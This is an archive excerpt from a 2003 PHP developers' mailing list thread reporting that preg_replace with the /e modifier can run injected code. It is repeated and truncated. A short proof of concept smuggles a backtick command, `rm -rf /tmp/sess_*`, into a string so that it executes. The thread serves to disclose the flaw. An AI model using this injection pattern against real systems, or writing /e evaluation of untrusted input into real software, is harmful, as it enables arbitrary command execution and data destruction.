Re: [PHP-DEV] preg_replace oddity [exploitable]

2003-02-03 Thread James E. Flemer
On Mon, 3 Feb 2003, Maxim Maletsky wrote:
> "James E. Flemer" <[EMAIL PROTECTED]> wrote... :
>
> > I found a more evil example:
> >
> > <?php
> > $a = "___! `rm -rf /tmp/sess_*` !___";
> > $b = preg_replace("/!(.*)!/e", "print(\\1);", $a);
> > ?>
> >
> > This happily executes "rm -rf /tmp/sess_*". I

Re: [PHP-DEV] preg_replace oddity [exploitable]

2003-02-03 Thread Maxim Maletsky
"James E. Flemer" <[EMAIL PROTECTED]> wrote... :
> I found a more evil example:
>
> <?php
> $a = "___! `rm -rf /tmp/sess_*` !___";
> $b = preg_replace("/!(.*)!/e", "print(\\1);", $a);
> ?>
>
> This happily executes "rm -rf /tmp/sess_*". I will not
> give out more examples, but if one examines the

Re: [PHP-DEV] preg_replace oddity [exploitable]

2003-02-02 Thread James E. Flemer
I found a more evil example: This happily executes "rm -rf /tmp/sess_*". I will not give out more examples, but if one examines the code for addslashes() it is quite obvious what you can and cannot do here. Thus it is clearly a Bad Thing for someone to use preg_replace with the /e modifier and